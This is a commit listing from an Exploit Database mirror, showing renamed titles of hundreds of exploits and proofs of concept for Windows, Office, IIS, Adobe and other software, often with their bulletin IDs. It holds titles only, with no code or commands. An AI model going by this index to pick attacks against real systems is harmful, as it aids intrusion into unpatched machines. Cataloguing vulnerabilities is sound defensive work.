DB: 2016-11-19 · toninodr/exploit-database@8948e76

Commit

DB: 2016-11-19

14 new exploits

Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)

Microsoft Windows - 'Jolt2.c' Denial of Service
Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)

Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service
Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)

Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)
Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)

Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)
Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)

Microsoft Windows 2003 - '.EOT' BSOD Crash
Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash

Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)

Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)
Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

Google Chrome 4.1 - OOB Array Indexing
Google Chrome 4.1 - Out-of-Bounds Array Indexing

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)
Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)

CommView 6.1 (Build 636) - Local Denial of Service (BSOD)
CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)

Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)
Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)

Microsoft Cinepak Codec CVDecompress - Heap Overflow
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)

Microsoft Unicode Scripts Processor - Remote Code Execution
Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)

Microsoft Office - HtmlDlgHelper Class Memory Corruption
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)

Microsoft Plug and Play Service - Overflow Exploit (Metasploit)
Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)

Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)
Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)

Microsoft HyperV - Persistent Denial of Service
Microsoft HyperV - Persistent Denial of Service (MS11-047)

Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)
Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption
Microsoft WINS - ECommEndDlg Input Validation Error
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)

Win32k - Null Pointer De-reference PoC (MS11-077)
Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)

Winows 7 keylayout - Blue Screen
Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073)

Apple Safari - GdiDrawStream BSoD
Apple Safari - GdiDrawStream Blue Screen of Death

PeerBlock 1.1 - BSOD Exploit
PeerBlock 1.1 - Blue Screen of Death Exploit

.NET Framework EncoderParameter - Integer Overflow
Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)

Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass
Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)

Microsoft Windows Media Services 4.0/4.1 - Denial of Service
Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)

Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)
Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)

Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service
Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)

Microsoft IIS 4.0/5.0 - FTP Denial of Service
Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)

Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service
Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)

Microsoft Windows XP/2000 - showHelp CHM File Execution
Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)

Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service
Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)

Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities
Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)

DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)

Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)

Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)

Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads
Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)

Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow
Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow

Avast! - OOB Write Decrypting PEncrypt Packed executables
Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables

Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)
Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)

Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Microsoft Edge - 'Array.splice' Heap Overflow
Moxa SoftCMS 1.5 - Denial of Service (PoC)
Microsoft Edge - 'FillFromPrototypes' Type Confusion
Microsoft Edge - 'Array.filter' Info Leak
Microsoft Edge - 'Array.reverse' Overflow
Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow
Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)

Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)

Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)

Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Microsoft Excel - 0x5D record Stack Overflow
Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Win32k - Keyboard Layout (MS10-073)
Microsoft Win32k - Keyboard Layout (MS10-073)
Adobe - Doc.media.newPlayer Use-After-Free (1)
Adobe - 'util.printf()' Buffer Overflow (1)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)
Adobe - JBIG2Decode Memory Corruption (1)
Adobe - Collab.getIcon() Buffer Overflow (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)
Adobe - Doc.media.newPlayer Use-After-Free (2)
Adobe - 'util.printf()' Buffer Overflow (2)
Microsoft Excel - Malformed FEATHEADER Record (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)

WM Downloader 3.1.2.2 - Buffer Overflow (2)
WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)

Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)
Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)
gAlan 0.2.1 - Buffer Overflow (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit)
gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)

BACnet OPC Client - Buffer Overflow (2)
BACnet OPC Client - Buffer Overflow (Metasploit) (2)

Adobe - JBIG2Decode Memory Corruption (2)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)

Mini-stream 3.0.1.1 - Buffer Overflow (2)
Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)
Adobe - Collab.getIcon() Buffer Overflow (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)

Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)
Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)

Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)

Microsoft Excel 2007 SP2 - Buffer Overwrite
Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)

Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)
Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3)

Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)
Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit)

Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)
Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)

Microsoft Office 2003 Home/Pro - Code Execution
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)

Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)
Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)

Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)
Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)

Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request
Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)

Microsoft Windows Kernel - Intel x64 SYSRET (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)

Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)
Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)

Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)
Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)

Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation
Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation
Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)
Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)

VMware - Setuid VMware-mount Unsafe popen(3)
VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)

Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit)
Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)

Microsoft Word - RTF Object Confusion (MS14-017)
Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
.NET Deployment Service - IE Sandbox Escape (MS14-009)
Registry Symlink - IE Sandbox Escape (MS13-097)
Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)
Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)

Microsoft Windows - OLE Package Manager Code Execution (MS14-060)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)

Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit)
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)

Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)
Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)

Microsoft Windows Server 2003 SP2 - Privilege Escalation
Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)

Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)

Publish-It - '.PUI' Buffer Overflow (SEH)
Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)
Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)

Microsoft Word - Local Machine Zone Remote Code Execution
Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)

VideoCharge Studio - Buffer Overflow (SEH)
VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - NtUserGetClipboardAccessToken Token Leak
Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)

Microsoft Windows - Font Driver Buffer Overflow (MS15-078)
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)

Nagios 4.2.2 - Privilege Escalation

ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)

VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation
Palo Alto Networks PanOS root_trace - Privilege Escalation
Palo Alto Networks PanOS root_reboot - Privilege Escalation

RealServer < 8.0.2 - Remote Exploit (Windows Platforms)
RealServer < 8.0.2 (Windows Platforms) - Remote Exploit

Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)
Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)
Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)

Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)
Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)

Microsoft Windows - 'WINS' Remote Buffer Overflow (3)
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)
eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)

Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)

Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)
Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)

CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)

Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)

Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)
Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)

Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly
Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)

Movie Maker - Remote Code Execution (MS10-016)
Microsoft Movie Maker - Remote Code Execution (MS10-016)

ASP.NET - Padding Oracle (MS10-070)
Microsoft ASP.NET - Padding Oracle (MS10-070)
ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce
Microsoft ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce (MS10-012)

ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)
Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)

Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)

Axis2 - Authenticated Code Execution (via REST)
Axis2 - Authenticated Code Execution (via REST) (Metasploit)

Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)
Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)
Microsoft IIS - Phone Book Service Overflow (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)
Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)
Microsoft WINS - Service Memory Overwrite (Metasploit)
Microsoft Windows - SMB Relay Code Execution (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit)
Microsoft RRAS Service - Overflow Exploit (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)
Microsoft NetDDE Service - Overflow Exploit (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066)
Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)

Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)
Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit)
Microsoft SQL Server - Resolution Overflow (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)

Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)

Microsoft SQL Server - Hello Overflow (Metasploit)
Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)

Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)
Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)

Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)
Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)

Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)

